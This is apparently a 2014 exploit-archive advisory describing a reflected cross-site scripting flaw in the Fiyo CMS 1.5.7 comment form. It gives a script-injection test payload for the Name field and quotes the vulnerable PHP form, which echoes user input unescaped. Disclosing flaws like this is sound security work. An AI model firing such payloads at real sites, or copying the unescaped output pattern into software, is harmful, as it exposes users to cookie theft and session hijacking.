Fiyo CMS version 1.5.7 suffers from a cross site scripting vulnerability.
08fed02f9f2b63e9e1312b61486223ac28bb6b6a3ced74fc74a2776b5d4d06ab
# Exploit Title: Fiyo CMS 1.5.7 XSS Vulnerability
# Date: 05/29/2014
# Author: Mustafa ALTINKAYNAK
# Download URL :https://www.fiyo.org/
# Software Link: https://www.fiyo.org/download
# Vuln Category: CWE-79 (XSS)
# Tested on: Fiyo CMS 1.5.7
# Tested Local Platform : XAMP on Windows
# Patch/ Fix: Not published.
---------------------------
Technical Details
---------------------------
Reflected XSS : Review form can be bypassed. Users can be played cookies.
Example :
Nama : "><script>alert("test");</script>
---------------------------------------------------------------------------------
Form Comment (XSS Vuln)
# /apps/app_comment/form_comment.php
<?php
/**
* @name Comment
* @version 1.5.0
* @package Fiyo CMS
* @copyright Copyright (C) 2012 Fiyo CMS.
* @license GNU/GPL, see LICENSE.txt
* @description
**/
defined('_FINDEX_') or die('Access Denied');
?>
<script>
function reloadCaptcha() {
document.getElementById('captcha').src = document.getElementById('captcha').src+ '?' +new Date();
}
</script>
<h3 id="comments" ><?php echo comment_Leave_Comment; ?></h3>
<?php echo @$notice; ?>
<form method="post" action="#comments" class="form-comment">
<div><label><span><?php echo comment_Name; ?> *</span><div>
<input type='text' name='name' style='width:60%; max-width : 200px;' value ="<?php echo @$name; ?>" <?php if(!empty($name)) echo "readonly"; ?> class="input required" placeholder="Name" required></label></div>
</div>
<div><label><span><?php echo comment_Email; ?> *</span><div>
<input class="input required email" style='width:60%; max-width : 200px;' type='email' name='email' value ="<?php echo @$email; ?>" <?php if(!empty($email)) echo "readonly"; ?> placeholder="name@email.com" required></label></div>
</div>
<div><label><span><?php echo comment_Website; ?> </span><div>
<input type="url" class="input" style="width:60%; max-width : 200px;" name="web" value="<?php echo @$_POST['web']; ?>" placeholder="https://" /></label></div>
</div>
<div><label><span><?php echo comment_Comment; ?> *</span><div>
<textarea class="input required" name='com' style='width:100%; max-width : 500px;' rows="8" required><?php echo @$_POST['com']; ?></textarea></label></div>
</div>
<?php if(empty($privatekey) or empty($publickey )) : ?>
<div><span><?php echo comment_Security_Code; ?> * </span> <div><img src="<?php echo FUrl; ?>/plugins/plg_mathcaptcha/image.php" alt="Click to reload image" title="Click to reload image" id="captcha" onclick="javascript:reloadCaptcha()" class="captcha-image" /></div><input type="text" name="secure" placeholder="What's the result?" onclick="this.value=''" class="input required numeric" required /></div>
<?php else : ?>
<div>
<span>ReCaptcha *</span>
<div>
<script type="text/javascript">
var RecaptchaOptions = {
theme : 'clean'
};
</script>
<?php echo recaptcha_get_html($publickey);?>
</div>
</div>
<?php endif; ?>
<div style="overflow: visible;">
<input type='submit' name='send-comment' class='comment-button button btn' value="Send">
</div>
</form>
-----------
Mustafa ALTINKAYNAK
twitter : @m_altinkaynak <https://twitter.com/m_altinkaynak>
www.mustafaaltinkaynak.com